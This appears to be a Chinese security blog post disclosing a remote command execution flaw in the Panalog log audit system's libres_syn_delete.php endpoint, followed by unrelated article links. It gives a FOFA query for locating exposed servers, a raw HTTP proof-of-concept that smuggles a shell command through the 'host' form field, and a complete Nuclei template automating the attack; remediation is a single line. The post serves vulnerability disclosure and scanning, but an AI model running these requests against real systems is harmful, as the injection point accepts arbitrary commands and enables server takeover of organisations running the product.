Panalog 日志审计系统RCE漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务

Panalog 日志审计系统 libres_syn_delete.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。

影响范围

version <= MARS r10p1Free

Ⅱ、fofa语句

复制代码
app="Panabit-Panalog"

Ⅲ、漏洞复现

POC

复制代码
POST /content-apply/libres_syn_delete.php HTTP/1.1
Host: 1270.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
 
token=1&id=2&host=| echo "Hello World!" >ceshi.txt

1、构建poc

2、访问

复制代码
https://127.0.0.1/content-apply/ceshi.txt

Ⅳ、Nuclei-POC

复制代码
id: Panalog-RCE

info:
  name: Panalog 日志审计系统 libres_syn_delete.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="Panabit-Panalog"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /content-apply/libres_syn_delete.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
        Connection: close
        
        token=1&id=2&host=| echo "Hello World!" >{{filename}}.txt

      - |
        GET /content-apply/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0



    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")

Ⅴ、修复建议

升级至安全版本

相关推荐
星幻元宇VR1 小时前
VR心理健康学习机|沉浸式心理教育新模式
科技·学习·安全·vr·虚拟现实
薛定猫AI1 小时前
【深度解析】终端里的免费 AI 编程助手 Freebuff:多代理架构、模型路由与安全使用实战
人工智能·安全·架构
无心水9 小时前
【Hermes:安全、权限与生产环境】40、运行 Hermes 前的生命线:安全审计清单与 11 个必须检查的配置项
人工智能·安全·mcp协议·openclaw·养龙虾·hermes·honcho
@insist12312 小时前
信息安全工程师-测评核心知识框架与关键流程(上篇)
安全·软考·信息安全工程师·软件水平考试
lifejump12 小时前
Empire(帝国)CMS 7.5 XSS注入
前端·安全·xss
xixixi7777713 小时前
AI的“账号”与“钱包”:AWS与Circle同日出手,AI正从工具进化
人工智能·安全·ai·大模型·云计算·aws
JiaWen技术圈13 小时前
Web 安全深入审计检查清单
前端·安全
lifejump15 小时前
Dede(织梦)CMS渗透测试(all)
前端·网络·安全·web安全
星幻元宇VR15 小时前
VR文旅大空间|沉浸式体验重塑文旅新场景
科技·学习·安全·vr·虚拟现实
紫金桥软件16 小时前
组态软件新势力,安全可靠高性能经多行业认证紫金桥软件RealSCADA
安全·scada·组态软件·国产工业软件·监控组态软件